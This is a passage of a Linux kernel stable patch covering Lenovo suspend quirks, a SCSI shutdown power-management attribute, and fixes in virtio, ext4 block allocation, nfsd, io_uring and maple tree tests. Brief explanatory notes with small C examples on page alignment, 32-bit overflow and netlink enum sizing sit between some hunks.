++			DMI_MATCH(DMI_PRODUCT_NAME, "82YU"),
++		}
++	},
++	{
++		.ident = "V15 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "83CQ"),
++		}
++	},
++	{
++		.ident = "IdeaPad 1 14AMN7",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82VF"),
++		}
++	},
++	{
++		.ident = "IdeaPad 1 15AMN7",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82VG"),
++		}
++	},
++	{
++		.ident = "IdeaPad 1 15AMN7",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82X5"),
++		}
++	},
++	{
++		.ident = "IdeaPad Slim 3 14AMN8",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82XN"),
++		}
++	},
++	{
++		.ident = "IdeaPad Slim 3 15AMN8",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82XQ"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 30184f7b762c1..deed8c909a786 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -221,7 +221,8 @@ manage_start_stop_show(struct device *dev,
+ 
+ 	return sysfs_emit(buf, "%u\n",
+ 			  sdp->manage_system_start_stop &&
+-			  sdp->manage_runtime_start_stop);
++			  sdp->manage_runtime_start_stop &&
++			  sdp->manage_shutdown);
+ }
+ static DEVICE_ATTR_RO(manage_start_stop);
+ 
+@@ -287,6 +288,35 @@ manage_runtime_start_stop_store(struct device *dev,
+ }
+ static DEVICE_ATTR_RW(manage_runtime_start_stop);
+ 
++static ssize_t manage_shutdown_show(struct device *dev,
++				    struct device_attribute *attr, char *buf)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++
++	return sysfs_emit(buf, "%u\n", sdp->manage_shutdown);
++}
++
++static ssize_t manage_shutdown_store(struct device *dev,
++				     struct device_attribute *attr,
++				     const char *buf, size_t count)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++	bool v;
++
++	if (!capable(CAP_SYS_ADMIN))
++		return -EACCES;
++
++	if (kstrtobool(buf, &v))
++		return -EINVAL;
++
++	sdp->manage_shutdown = v;
++
++	return count;
++}
++static DEVICE_ATTR_RW(manage_shutdown);
++
+ static ssize_t
+ allow_restart_show(struct device *dev, struct device_attribute *attr, char *buf)
+ {
+@@ -619,6 +649,7 @@ static struct attribute *sd_disk_attrs[] = {
+ 	&dev_attr_manage_start_stop.attr,
+ 	&dev_attr_manage_system_start_stop.attr,
+ 	&dev_attr_manage_runtime_start_stop.attr,
++	&dev_attr_manage_shutdown.attr,
+ 	&dev_attr_protection_type.attr,
+ 	&dev_attr_protection_mode.attr,
+ 	&dev_attr_app_tag_own.attr,
+@@ -3700,8 +3731,10 @@ static void sd_shutdown(struct device *dev)
+ 		sd_sync_cache(sdkp, NULL);
+ 	}
+ 
+-	if (system_state != SYSTEM_RESTART &&
+-	    sdkp->device->manage_system_start_stop) {
++	if ((system_state != SYSTEM_RESTART &&
++	     sdkp->device->manage_system_start_stop) ||
++	    (system_state == SYSTEM_POWER_OFF &&
++	     sdkp->device->manage_shutdown)) {
+ 		sd_printk(KERN_NOTICE, sdkp, "Stopping disk\n");
+ 		sd_start_stop_device(sdkp, 0);
+ 	}
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 1a059b028c501..2eea080298812 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -1176,9 +1176,7 @@ ssize_t vhost_chr_write_iter(struct vhost_dev *dev,
+ 		goto done;
+ 	}
+ 
+-	if ((msg.type == VHOST_IOTLB_UPDATE ||
+-	     msg.type == VHOST_IOTLB_INVALIDATE) &&
+-	     msg.size == 0) {
++	if (msg.type == VHOST_IOTLB_UPDATE && msg.size == 0) {
+ 		ret = -EINVAL;
+ 		goto done;
+ 	}
+diff --git a/drivers/virtio/virtio_balloon.c b/drivers/virtio/virtio_balloon.c
+index 3f78a3a1eb753..aa90bd0199d7e 100644
+--- a/drivers/virtio/virtio_balloon.c
++++ b/drivers/virtio/virtio_balloon.c
+@@ -395,7 +395,11 @@ static inline s64 towards_target(struct virtio_balloon *vb)
+ 	virtio_cread_le(vb->vdev, struct virtio_balloon_config, num_pages,
+ 			&num_pages);
+ 
+-	target = num_pages;
++	/*
++	 * Align the target up to the guest page size to avoid inflating
++	 * and deflating the balloon endlessly.
++	 */
++	target = ALIGN(num_pages, VIRTIO_BALLOON_PAGES_PER_PAGE);
+ 	return target - vb->num_pages;
+ }
+ 
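
ALIGN() here rounds the host's request up to a whole guest page; without it a
target between two multiples is unreachable, so the balloon inflates and
deflates forever around it. A minimal sketch (the ratio is hypothetical, e.g.
a 64 KiB guest page holding sixteen 4 KiB balloon pages):

	#define PAGES_PER_GUEST_PAGE	16u	/* hypothetical ratio */
	#define ALIGN_UP(x, a)		(((x) + (a) - 1) / (a) * (a))

	/* A request of 4097 becomes 4112, the nearest reachable target. */
	static inline unsigned int balloon_target(unsigned int num_pages)
	{
		return ALIGN_UP(num_pages, PAGES_PER_GUEST_PAGE);
	}
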
+diff --git a/drivers/virtio/virtio_mmio.c b/drivers/virtio/virtio_mmio.c
+index dec3cba884586..de1a081089417 100644
+--- a/drivers/virtio/virtio_mmio.c
++++ b/drivers/virtio/virtio_mmio.c
+@@ -614,14 +614,17 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 	spin_lock_init(&vm_dev->lock);
+ 
+ 	vm_dev->base = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(vm_dev->base))
+-		return PTR_ERR(vm_dev->base);
++	if (IS_ERR(vm_dev->base)) {
++		rc = PTR_ERR(vm_dev->base);
++		goto free_vm_dev;
++	}
+ 
+ 	/* Check magic value */
+ 	magic = readl(vm_dev->base + VIRTIO_MMIO_MAGIC_VALUE);
+ 	if (magic != ('v' | 'i' << 8 | 'r' << 16 | 't' << 24)) {
+ 		dev_warn(&pdev->dev, "Wrong magic value 0x%08lx!\n", magic);
+-		return -ENODEV;
++		rc = -ENODEV;
++		goto free_vm_dev;
+ 	}
+ 
+ 	/* Check device version */
+@@ -629,7 +632,8 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 	if (vm_dev->version < 1 || vm_dev->version > 2) {
+ 		dev_err(&pdev->dev, "Version %ld not supported!\n",
+ 				vm_dev->version);
+-		return -ENXIO;
++		rc = -ENXIO;
++		goto free_vm_dev;
+ 	}
+ 
+ 	vm_dev->vdev.id.device = readl(vm_dev->base + VIRTIO_MMIO_DEVICE_ID);
+@@ -638,7 +642,8 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 		 * virtio-mmio device with an ID 0 is a (dummy) placeholder
+ 		 * with no function. End probing now with no error reported.
+ 		 */
+-		return -ENODEV;
++		rc = -ENODEV;
++		goto free_vm_dev;
+ 	}
+ 	vm_dev->vdev.id.vendor = readl(vm_dev->base + VIRTIO_MMIO_VENDOR_ID);
+ 
+@@ -668,6 +673,10 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 		put_device(&vm_dev->vdev.dev);
+ 
+ 	return rc;
++
++free_vm_dev:
++	kfree(vm_dev);
++	return rc;
+ }
+ 
+ static int virtio_mmio_remove(struct platform_device *pdev)
+diff --git a/drivers/virtio/virtio_pci_modern_dev.c b/drivers/virtio/virtio_pci_modern_dev.c
+index 869cb46bef960..ccdd41935ed71 100644
+--- a/drivers/virtio/virtio_pci_modern_dev.c
++++ b/drivers/virtio/virtio_pci_modern_dev.c
+@@ -282,7 +282,7 @@ int vp_modern_probe(struct virtio_pci_modern_device *mdev)
+ 	err = -EINVAL;
+ 	mdev->common = vp_modern_map_capability(mdev, common,
+ 				      sizeof(struct virtio_pci_common_cfg), 4,
+-				      0, sizeof(struct virtio_pci_common_cfg),
++				      0, sizeof(struct virtio_pci_modern_common_cfg),
+ 				      NULL, NULL);
+ 	if (!mdev->common)
+ 		goto err_map_common;
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 3c8300e08f412..6ea6b7105fe35 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4022,8 +4022,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	struct ext4_sb_info *sbi = EXT4_SB(ac->ac_sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+ 	int bsbits, max;
+-	ext4_lblk_t end;
+-	loff_t size, start_off;
++	loff_t size, start_off, end;
+ 	loff_t orig_size __maybe_unused;
+ 	ext4_lblk_t start;
+ 	struct ext4_inode_info *ei = EXT4_I(ac->ac_inode);
+@@ -4052,7 +4051,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 
+ 	/* first, let's learn actual file size
+ 	 * given current request is allocated */
+-	size = ac->ac_o_ex.fe_logical + EXT4_C2B(sbi, ac->ac_o_ex.fe_len);
++	size = extent_logical_end(sbi, &ac->ac_o_ex);
+ 	size = size << bsbits;
+ 	if (size < i_size_read(ac->ac_inode))
+ 		size = i_size_read(ac->ac_inode);
+@@ -4131,7 +4130,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	/* check we don't cross already preallocated blocks */
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(pa, &ei->i_prealloc_list, pa_inode_list) {
+-		ext4_lblk_t pa_end;
++		loff_t pa_end;
+ 
+ 		if (pa->pa_deleted)
+ 			continue;
+@@ -4141,8 +4140,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 			continue;
+ 		}
+ 
+-		pa_end = pa->pa_lstart + EXT4_C2B(EXT4_SB(ac->ac_sb),
+-						  pa->pa_len);
++		pa_end = pa_logical_end(EXT4_SB(ac->ac_sb), pa);
+ 
+ 		/* PA must not overlap original request */
+ 		BUG_ON(!(ac->ac_o_ex.fe_logical >= pa_end ||
+@@ -4171,12 +4169,11 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	/* XXX: extra loop to check we really don't overlap preallocations */
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(pa, &ei->i_prealloc_list, pa_inode_list) {
+-		ext4_lblk_t pa_end;
++		loff_t pa_end;
+ 
+ 		spin_lock(&pa->pa_lock);
+ 		if (pa->pa_deleted == 0) {
+-			pa_end = pa->pa_lstart + EXT4_C2B(EXT4_SB(ac->ac_sb),
+-							  pa->pa_len);
++			pa_end = pa_logical_end(EXT4_SB(ac->ac_sb), pa);
+ 			BUG_ON(!(start >= pa_end || end <= pa->pa_lstart));
+ 		}
+ 		spin_unlock(&pa->pa_lock);
+@@ -4407,8 +4404,7 @@ ext4_mb_use_preallocated(struct ext4_allocation_context *ac)
+ 		/* all fields in this condition don't change,
+ 		 * so we can skip locking for them */
+ 		if (ac->ac_o_ex.fe_logical < pa->pa_lstart ||
+-		    ac->ac_o_ex.fe_logical >= (pa->pa_lstart +
+-					       EXT4_C2B(sbi, pa->pa_len)))
++		    ac->ac_o_ex.fe_logical >= pa_logical_end(sbi, pa))
+ 			continue;
+ 
+ 		/* non-extent files can't have physical blocks past 2^32 */
+@@ -4653,8 +4649,11 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 	pa = ac->ac_pa;
+ 
+ 	if (ac->ac_b_ex.fe_len < ac->ac_g_ex.fe_len) {
+-		int new_bex_start;
+-		int new_bex_end;
++		struct ext4_free_extent ex = {
++			.fe_logical = ac->ac_g_ex.fe_logical,
++			.fe_len = ac->ac_g_ex.fe_len,
++		};
++		loff_t orig_goal_end = extent_logical_end(sbi, &ex);
+ 
+ 		/* we can't allocate as much as normalizer wants.
+ 		 * so, found space must get proper lstart
+@@ -4673,29 +4672,23 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		 *    still cover original start
+ 		 * 3. Else, keep the best ex at start of original request.
+ 		 */
+-		new_bex_end = ac->ac_g_ex.fe_logical +
+-			EXT4_C2B(sbi, ac->ac_g_ex.fe_len);
+-		new_bex_start = new_bex_end - EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+-		if (ac->ac_o_ex.fe_logical >= new_bex_start)
+-			goto adjust_bex;
++		ex.fe_len = ac->ac_b_ex.fe_len;
+ 
+-		new_bex_start = ac->ac_g_ex.fe_logical;
+-		new_bex_end =
+-			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+-		if (ac->ac_o_ex.fe_logical < new_bex_end)
++		ex.fe_logical = orig_goal_end - EXT4_C2B(sbi, ex.fe_len);
++		if (ac->ac_o_ex.fe_logical >= ex.fe_logical)
+ 			goto adjust_bex;
+ 
+-		new_bex_start = ac->ac_o_ex.fe_logical;
+-		new_bex_end =
+-			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
++		ex.fe_logical = ac->ac_g_ex.fe_logical;
++		if (ac->ac_o_ex.fe_logical < extent_logical_end(sbi, &ex))
++			goto adjust_bex;
+ 
++		ex.fe_logical = ac->ac_o_ex.fe_logical;
+ adjust_bex:
+-		ac->ac_b_ex.fe_logical = new_bex_start;
++		ac->ac_b_ex.fe_logical = ex.fe_logical;
+ 
+ 		BUG_ON(ac->ac_o_ex.fe_logical < ac->ac_b_ex.fe_logical);
+ 		BUG_ON(ac->ac_o_ex.fe_len > ac->ac_b_ex.fe_len);
+-		BUG_ON(new_bex_end > (ac->ac_g_ex.fe_logical +
+-				      EXT4_C2B(sbi, ac->ac_g_ex.fe_len)));
++		BUG_ON(extent_logical_end(sbi, &ex) > orig_goal_end);
+ 	}
+ 
+ 	/* preallocation can change ac_b_ex, thus we store actually
+@@ -5229,7 +5222,7 @@ static void ext4_mb_group_or_file(struct ext4_allocation_context *ac)
+ 
+ 	group_pa_eligible = sbi->s_mb_group_prealloc > 0;
+ 	inode_pa_eligible = true;
+-	size = ac->ac_o_ex.fe_logical + EXT4_C2B(sbi, ac->ac_o_ex.fe_len);
++	size = extent_logical_end(sbi, &ac->ac_o_ex);
+ 	isize = (i_size_read(ac->ac_inode) + ac->ac_sb->s_blocksize - 1)
+ 		>> bsbits;
+ 
+diff --git a/fs/ext4/mballoc.h b/fs/ext4/mballoc.h
+index dcda2a943cee0..00b3898df4a76 100644
+--- a/fs/ext4/mballoc.h
++++ b/fs/ext4/mballoc.h
+@@ -218,6 +218,20 @@ static inline ext4_fsblk_t ext4_grp_offs_to_block(struct super_block *sb,
+ 		(fex->fe_start << EXT4_SB(sb)->s_cluster_bits);
+ }
+ 
++static inline loff_t extent_logical_end(struct ext4_sb_info *sbi,
++					struct ext4_free_extent *fex)
++{
++	/* Use loff_t to avoid end exceeding ext4_lblk_t max. */
++	return (loff_t)fex->fe_logical + EXT4_C2B(sbi, fex->fe_len);
++}
++
++static inline loff_t pa_logical_end(struct ext4_sb_info *sbi,
++				    struct ext4_prealloc_space *pa)
++{
++	/* Use loff_t to avoid end exceeding ext4_lblk_t max. */
++	return (loff_t)pa->pa_lstart + EXT4_C2B(sbi, pa->pa_len);
++}
++
+ typedef int (*ext4_mballoc_query_range_fn)(
+ 	struct super_block		*sb,
+ 	ext4_group_t			agno,
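
The point of the (loff_t) cast in both helpers is width: ext4_lblk_t is a
32-bit type, so start + len computed in it wraps once an extent ends at or
past 2^32 blocks. A stand-alone illustration with made-up values:

	#include <stdint.h>
	#include <stdio.h>

	int main(void)
	{
		uint32_t start = 0xFFFFFF00u;	/* logical start block */
		uint32_t len = 0x200;		/* extent length in blocks */

		uint32_t wrapped = start + len;		/* wraps to 0x100 */
		int64_t end = (int64_t)start + len;	/* 0x100000100 */

		printf("32-bit end 0x%x, 64-bit end 0x%llx\n",
		       wrapped, (unsigned long long)end);
		return 0;
	}
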
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 4c11046800ab4..eccc6ce55a63a 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1659,6 +1659,12 @@ nfsd_rename(struct svc_rqst *rqstp, struct svc_fh *ffhp, char *fname, int flen,
+ 	if (!flen || isdotent(fname, flen) || !tlen || isdotent(tname, tlen))
+ 		goto out;
+ 
++	err = (rqstp->rq_vers == 2) ? nfserr_acces : nfserr_xdev;
++	if (ffhp->fh_export->ex_path.mnt != tfhp->fh_export->ex_path.mnt)
++		goto out;
++	if (ffhp->fh_export->ex_path.dentry != tfhp->fh_export->ex_path.dentry)
++		goto out;
++
+ retry:
+ 	host_err = fh_want_write(ffhp);
+ 	if (host_err) {
+@@ -1690,12 +1696,6 @@ retry:
+ 	if (ndentry == trap)
+ 		goto out_dput_new;
+ 
+-	host_err = -EXDEV;
+-	if (ffhp->fh_export->ex_path.mnt != tfhp->fh_export->ex_path.mnt)
+-		goto out_dput_new;
+-	if (ffhp->fh_export->ex_path.dentry != tfhp->fh_export->ex_path.dentry)
+-		goto out_dput_new;
+-
+ 	if ((ndentry->d_sb->s_export_op->flags & EXPORT_OP_CLOSE_BEFORE_UNLINK) &&
+ 	    nfsd_has_cached_files(ndentry)) {
+ 		close_cached = true;
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 58b53d08f2c8e..e46f6b49eb389 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -70,6 +70,7 @@ struct resv_map {
+ 	long adds_in_progress;
+ 	struct list_head region_cache;
+ 	long region_cache_count;
++	struct rw_semaphore rw_sema;
+ #ifdef CONFIG_CGROUP_HUGETLB
+ 	/*
+ 	 * On private mappings, the counter to uncharge reservations is stored
+@@ -879,6 +880,11 @@ static inline bool hugepage_migration_supported(struct hstate *h)
+ 	return arch_hugetlb_migration_supported(h);
+ }
+ 
++static inline bool __vma_private_lock(struct vm_area_struct *vma)
++{
++	return (!(vma->vm_flags & VM_MAYSHARE)) && vma->vm_private_data;
++}
++
+ /*
+  * Movability check is different as compared to migration check.
+  * It determines whether or not a huge page should be placed on
+diff --git a/include/linux/kasan.h b/include/linux/kasan.h
+index d811b3d7d2a15..6e6f0238d63cc 100644
+--- a/include/linux/kasan.h
++++ b/include/linux/kasan.h
+@@ -471,10 +471,10 @@ static inline void kasan_free_module_shadow(const struct vm_struct *vm) {}
+ 
+ #endif /* (CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS) && !CONFIG_KASAN_VMALLOC */
+ 
+-#ifdef CONFIG_KASAN_INLINE
++#ifdef CONFIG_KASAN
+ void kasan_non_canonical_hook(unsigned long addr);
+-#else /* CONFIG_KASAN_INLINE */
++#else /* CONFIG_KASAN */
+ static inline void kasan_non_canonical_hook(unsigned long addr) { }
+-#endif /* CONFIG_KASAN_INLINE */
++#endif /* CONFIG_KASAN */
+ 
+ #endif /* LINUX_KASAN_H */
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index dc2cff18b68bd..5aabc36fb249b 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -162,8 +162,24 @@ struct scsi_device {
+ 				 * core. */
+ 	unsigned int eh_timeout; /* Error handling timeout */
+ 
+-	bool manage_system_start_stop; /* Let HLD (sd) manage system start/stop */
+-	bool manage_runtime_start_stop; /* Let HLD (sd) manage runtime start/stop */
++	/*
++	 * If true, let the high-level device driver (sd) manage the device
++	 * power state for system suspend/resume (suspend to RAM and
++	 * hibernation) operations.
++	 */
++	bool manage_system_start_stop;
++
++	/*
++	 * If true, let the high-level device driver (sd) manage the device
++	 * power state for runtime device suspend and resume operations.
++	 */
++	bool manage_runtime_start_stop;
++
++	/*
++	 * If true, let the high-level device driver (sd) manage the device
++	 * power state for system shutdown (power off) operations.
++	 */
++	bool manage_shutdown;
+ 
+ 	unsigned removable:1;
+ 	unsigned changed:1;	/* Data invalid due to media change */
+diff --git a/include/uapi/linux/gtp.h b/include/uapi/linux/gtp.h
+index 2f61298a7b779..3dcdb9e33cba2 100644
+--- a/include/uapi/linux/gtp.h
++++ b/include/uapi/linux/gtp.h
+@@ -33,6 +33,6 @@ enum gtp_attrs {
+ 	GTPA_PAD,
+ 	__GTPA_MAX,
+ };
+-#define GTPA_MAX (__GTPA_MAX + 1)
++#define GTPA_MAX (__GTPA_MAX - 1)
+ 
+ #endif /* _UAPI_LINUX_GTP_H_ */
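
The corrected define follows the standard netlink enum convention: __FOO_MAX
is one past the last real attribute, FOO_MAX names the highest valid one, and
attribute tables are sized FOO_MAX + 1; the old "+ 1" overstated the maximum
by two. An illustrative enum (not the real header):

	enum {
		FOO_UNSPEC,
		FOO_LINK,
		FOO_VERSION,
		__FOO_MAX,		/* one past the last attribute */
	};
	#define FOO_MAX (__FOO_MAX - 1)	/* == FOO_VERSION */

	static const int foo_policy[FOO_MAX + 1];	/* one slot per attribute */
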
+diff --git a/io_uring/fdinfo.c b/io_uring/fdinfo.c
+index 882bd56b01ed0..ea2c2ded4e412 100644
+--- a/io_uring/fdinfo.c
++++ b/io_uring/fdinfo.c
+@@ -51,7 +51,6 @@ static __cold int io_uring_show_cred(struct seq_file *m, unsigned int id,
+ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 					  struct seq_file *m)
+ {
+-	struct io_sq_data *sq = NULL;
+ 	struct io_overflow_cqe *ocqe;
+ 	struct io_rings *r = ctx->rings;
+ 	unsigned int sq_mask = ctx->sq_entries - 1, cq_mask = ctx->cq_entries - 1;
+@@ -62,6 +61,7 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 	unsigned int cq_shift = 0;
+ 	unsigned int sq_shift = 0;
+ 	unsigned int sq_entries, cq_entries;
++	int sq_pid = -1, sq_cpu = -1;
+ 	bool has_lock;
+ 	unsigned int i;
+ 
+@@ -139,13 +139,19 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 	has_lock = mutex_trylock(&ctx->uring_lock);
+ 
+ 	if (has_lock && (ctx->flags & IORING_SETUP_SQPOLL)) {
+-		sq = ctx->sq_data;
+-		if (!sq->thread)
+-			sq = NULL;
++		struct io_sq_data *sq = ctx->sq_data;
++
++		if (mutex_trylock(&sq->lock)) {
++			if (sq->thread) {
++				sq_pid = task_pid_nr(sq->thread);
++				sq_cpu = task_cpu(sq->thread);
++			}
++			mutex_unlock(&sq->lock);
++		}
+ 	}
+ 
+-	seq_printf(m, "SqThread:\t%d\n", sq ? task_pid_nr(sq->thread) : -1);
+-	seq_printf(m, "SqThreadCpu:\t%d\n", sq ? task_cpu(sq->thread) : -1);
++	seq_printf(m, "SqThread:\t%d\n", sq_pid);
++	seq_printf(m, "SqThreadCpu:\t%d\n", sq_cpu);
+ 	seq_printf(m, "UserFiles:\t%u\n", ctx->nr_user_files);
+ 	for (i = 0; has_lock && i < ctx->nr_user_files; i++) {
+ 		struct file *f = io_file_from_index(&ctx->file_table, i);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 2b8315a948a2c..8f2b9d8b9150e 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -13293,7 +13293,8 @@ static int inherit_group(struct perf_event *parent_event,
+ 		    !perf_get_aux_event(child_ctr, leader))
+ 			return -EINVAL;
+ 	}
+-	leader->group_generation = parent_event->group_generation;
++	if (leader)
++		leader->group_generation = parent_event->group_generation;
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index 22852029c6924..56675294d7a3b 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -989,7 +989,7 @@ EXPORT_SYMBOL_GPL(kprobe_event_cmd_init);
+  * @name: The name of the kprobe event
+  * @loc: The location of the kprobe event
+  * @kretprobe: Is this a return probe?
+- * @args: Variable number of arg (pairs), one pair for each field
++ * @...: Variable number of arg (pairs), one pair for each field
+  *
+  * NOTE: Users normally won't want to call this function directly, but
+  * rather use the kprobe_event_gen_cmd_start() wrapper, which automatically
+@@ -1062,7 +1062,7 @@ EXPORT_SYMBOL_GPL(__kprobe_event_gen_cmd_start);
+ /**
+  * __kprobe_event_add_fields - Add probe fields to a kprobe command from arg list
+  * @cmd: A pointer to the dynevent_cmd struct representing the new event
+- * @args: Variable number of arg (pairs), one pair for each field
++ * @...: Variable number of arg (pairs), one pair for each field
+  *
+  * NOTE: Users normally won't want to call this function directly, but
+  * rather use the kprobe_event_add_fields() wrapper, which
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 250b4c67fac8f..4976522e3e481 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5913,7 +5913,7 @@ int mas_expected_entries(struct ma_state *mas, unsigned long nr_entries)
+ 	/* Internal nodes */
+ 	nr_nodes += DIV_ROUND_UP(nr_nodes, nonleaf_cap);
+ 	/* Add working room for split (2 nodes) + new parents */
+-	mas_node_count(mas, nr_nodes + 3);
++	mas_node_count_gfp(mas, nr_nodes + 3, GFP_KERNEL);
+ 
+ 	/* Detect if allocations run out */
+ 	mas->mas_flags |= MA_STATE_PREALLOC;
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index fad668042f3e7..ab9d4461abc9d 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -9,6 +9,7 @@
+ 
+ #include <linux/maple_tree.h>
+ #include <linux/module.h>
++#include <linux/rwsem.h>
+ 
+ #define MTREE_ALLOC_MAX 0x2000000000000Ul
+ #ifndef CONFIG_DEBUG_MAPLE_TREE
+@@ -1678,17 +1679,21 @@ static noinline void __init check_forking(struct maple_tree *mt)
+ 	void *val;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	MA_STATE(newmas, mt, 0, 0);
++	struct rw_semaphore newmt_lock;
++
++	init_rwsem(&newmt_lock);
+ 
+ 	for (i = 0; i <= nr_entries; i++)
+ 		mtree_store_range(mt, i*10, i*10 + 5,
+ 				  xa_mk_value(i), GFP_KERNEL);
+ 
+ 	mt_set_non_kernel(99999);
+-	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE);
++	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN);
++	mt_set_external_lock(&newmt, &newmt_lock);
+ 	newmas.tree = &newmt;
+ 	mas_reset(&newmas);
+ 	mas_reset(&mas);
+-	mas_lock(&newmas);
++	down_write(&newmt_lock);
+ 	mas.index = 0;
+ 	mas.last = 0;
+ 	if (mas_expected_entries(&newmas, nr_entries)) {
+@@ -1703,10 +1708,10 @@ static noinline void __init check_forking(struct maple_tree *mt)
+ 	}
+ 	rcu_read_unlock();
+ 	mas_destroy(&newmas);
+-	mas_unlock(&newmas);
+ 	mt_validate(&newmt);
+ 	mt_set_non_kernel(0);
+-	mtree_destroy(&newmt);
++	__mt_destroy(&newmt);
++	up_write(&newmt_lock);
+ }
+ 
+ static noinline void __init check_iteration(struct maple_tree *mt)
+@@ -1818,6 +1823,10 @@ static noinline void __init bench_forking(struct maple_tree *mt)
+ 	void *val;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	MA_STATE(newmas, mt, 0, 0);
++	struct rw_semaphore newmt_lock;
++
++	init_rwsem(&newmt_lock);
++	mt_set_external_lock(&newmt, &newmt_lock);
+ 
+ 	for (i = 0; i <= nr_entries; i++)
+ 		mtree_store_range(mt, i*10, i*10 + 5,
+@@ -1832,7 +1841,7 @@ static noinline void __init bench_forking(struct maple_tree *mt)
+ 		mas.index = 0;
+ 		mas.last = 0;
+ 		rcu_read_lock();
+-		mas_lock(&newmas);
++		down_write(&newmt_lock);
+ 		if (mas_expected_entries(&newmas, nr_entries)) {
+ 			printk("OOM!");
+ 			BUG_ON(1);
+@@ -1843,11 +1852,11 @@ static noinline void __init bench_forking(struct maple_tree *mt)
+ 			mas_store(&newmas, val);
+ 		}
+ 		mas_destroy(&newmas);
+-		mas_unlock(&newmas);
+ 		rcu_read_unlock();
+ 		mt_validate(&newmt);
+ 		mt_set_non_kernel(0);
+-		mtree_destroy(&newmt);
++		__mt_destroy(&newmt);
++		up_write(&newmt_lock);
+ 	}
+ }
+ #endif
+@@ -2453,6 +2462,10 @@ static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 	void *tmp;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	MA_STATE(newmas, &newmt, 0, 0);
++	struct rw_semaphore newmt_lock;
++
++	init_rwsem(&newmt_lock);
++	mt_set_external_lock(&newmt, &newmt_lock);
+ 
+ 	if (!zero_start)
+ 		i = 1;
+@@ -2462,9 +2475,9 @@ static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 		mtree_store_range(mt, i*10, (i+1)*10 - gap,
+ 				  xa_mk_value(i), GFP_KERNEL);
+ 
+-	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE);
++	mt_init_flags(&newmt, MT_FLAGS_ALLOC_RANGE | MT_FLAGS_LOCK_EXTERN);
+ 	mt_set_non_kernel(99999);
